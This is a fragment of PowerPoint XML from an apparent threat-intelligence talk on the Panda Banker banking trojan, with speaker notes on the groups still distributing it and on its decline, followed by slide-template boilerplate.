        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19231249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Hancitor’s Panda Banker does not use webinjects, relying instead on the other functionality that comes with the malware such as form grabbing and keylogging. Distribution-wise they tend to focus on the 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Another interesting thing about the Hancitor gang is that based on my current visibility they are one of the last groups still actively using Panda Banker in the wild. Though that may be changing… For example, in their September 26th campaign, instead of deliverying Panda Banker they pushed out the DanaBot banking malware. They returned to their normally scheduled Panda Banker for a few campaigns and then on October 29</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> switched to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ursnif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. After this campaign they took a month long vacation where they were missing from the threat  landscape. They returned on November 29, continuing with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ursnif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18151845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until late November, I would have said that the Hancitor Gang was _the last_ group still using Panda Banker in the wild, but a couple of researchers have a found an additional group that is still active.</a:t>
            </a:r>
          </a:p>
          <a:p>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92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6003439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call this group the NOP Gang based on the botnet name they use and they’ve been sporadically active since March 2017.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that sticks out to me about this group is that despite being active in the wild, they haven’t upgraded to the latest version of Panda Banker for some reason—they’re still using version 2.6.9 instead of the latest 2.6.10… So maybe their support contract expired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93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38287737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don’t have good insight into how this group distributes Panda Banker, but they’ve used around 50 webinjects to target financial institutions in Australia and Canada.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>94</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="211126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only have unsubstantiated theories on what might of happened to Panda Banker... It seems odd to me that there was so much development activity in the first half of the year only for it to come to a abrupt stop in June. But maybe the developer decided to go on an extended holiday…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When I was discussing the Italian Job group, I mentioned that their might have been a take down of their infrastructure in September 2018. Coincidently, this was also around the time that Panda Banker activity _in general_ started declining so perhaps the other folks associated with Panda got scared into hiding or got caught up in some sort of legal action associated with it…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28689212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Like-wise, in November 2016 there was the takedown and sinkholing of the “Avalanche” malware hosting network… I haven’t seen many details about this action outside the initial press release, but that release did mention that Panda Banker was one of the malwares found to be hosted on that network. Perhaps something panned out from that takedown and investigation that has helped cause the decline of Panda Banker…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Like I said though, unsubstantiated theories…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>96</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42285569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here are some public places that I know of to keep an eye on for new Panda Banker samples.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31021562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There’s also some good reference material out there as well.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>98</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42944913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that’s almost everything I know about Panda Banker. I’ll put up my slides soon. Please reach out if you want to talk about Pandas! Thanks much for listening!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2088070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 name="Picture 2" descr="16-9-title-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533400" y="1371600"/>
            <a:ext cx="7543800" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="6500" b="1" i="0" cap="all" spc="-300" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="51788F"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Insert Presentation Title Here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585216" y="4572000"/>
            <a:ext cx="9092184" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="2000" b="1" i="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="4D4C5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Info</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="proofpoint-rebrand-logo.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5176" y="236504"/>
            <a:ext cx="2461591" cy="6028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763342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3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2" name="Picture 1" descr="16-9-end-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a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="452285"/>
            <a:ext cx="10515600" cy="766915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3600" b="1" i="0" spc="-150" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="3D5A6A"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>THE TIME IS NOW!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1219200"/>
            <a:ext cx="5029200" cy="4351338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="65656A"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="465138" indent="-227013">
              <a:tabLst/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="65656A"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="693738" indent="-228600">
              <a:tabLst/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="65656A"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="922338" indent="-228600">
              <a:tabLst/>
              <a:defRPr sz="1400"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1150938" indent="-228600">
              <a:tabLst/>
              <a:defRPr sz="2000"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First Level Body Text, Arial Regular, 20pt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First Level Body Text, Arial Regular, 20pt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First Level Body Text, Arial Regular, 20pt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First Level Body Text, Arial Regular, 20pt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1305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5" name="Picture 4" descr="16-9-end-2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ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="0"/>
            <a:ext cx="11658600" cy="4343400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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sz="5000" b="1" i="0" spc="-300">
                <a:solidFill>
                  <a:srgbClr val="51788F"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IT’S TIME TO </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MAKE OUR </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MOVE AND </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ACCELERATE </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OUR LEAD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="2284802"/>
            <a:ext cx="11430000" cy="13660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10000" b="1" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue" charset="0"/>
                <a:ea typeface="Bebas Neue" charset="0"/>
                <a:cs typeface="Bebas Neue" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="6500" b="1" i="0" spc="-300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="51788F"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209859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6" name="Picture 5" descr="16-9-divider-bg-blue.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="1235" b="1235"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-1"/>
            <a:ext cx="12192000" cy="6858001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Proofpoint-logo-Revers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57400" y="2057400"/>
            <a:ext cx="7848600" cy="2703576"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3470039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2" name="Picture 1" descr="16-9-title-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533400" y="1371600"/>
            <a:ext cx="8686800" cy="2819400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="6800" b="1" i="0" cap="all" spc="-300" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="51788F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Insert Presentation Title Here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585216" y="4572000"/>
            <a:ext cx="9092184" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="2000" b="1" i="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="4D4C5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Info</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="proofpoint-rebrand-logo.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5176" y="236504"/>
            <a:ext cx="2461591" cy="6028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2251266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3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14"/>
            <a:ext cx="12192000" cy="6859714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="638020"/>
            <a:ext cx="10553700" cy="2970418"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="7000" b="1" i="0" spc="-300">
                <a:solidFill>
                  <a:srgbClr val="63B0E8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DIVIDER SLIDE TITLE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="3429857"/>
            <a:ext cx="10500646" cy="1500187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="3200" b="1" i="0" spc="-150">
                <a:solidFill>
                  <a:srgbClr val="51788F"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="62214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16-9-divider-bg-blue.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="1235" b="1235"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-1"/>
            <a:ext cx="12192000" cy="6858001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="638020"/>
            <a:ext cx="10553700" cy="2970418"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="7000" b="1" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DIVIDER SLIDE TITLE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="3429857"/>
            <a:ext cx="10500646" cy="1500187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="3200" b="1" i="0" spc="-150">
                <a:solidFill>
                  <a:srgbClr val="51788F"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12766445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Text Slide with Bullets, Arial 36pt.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1376515"/>
            <a:ext cx="10972800" cy="4351338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2000" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="65656A"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="465138" indent="-227013">
              <a:tabLst/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="65656A"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="693738" indent="-228600">
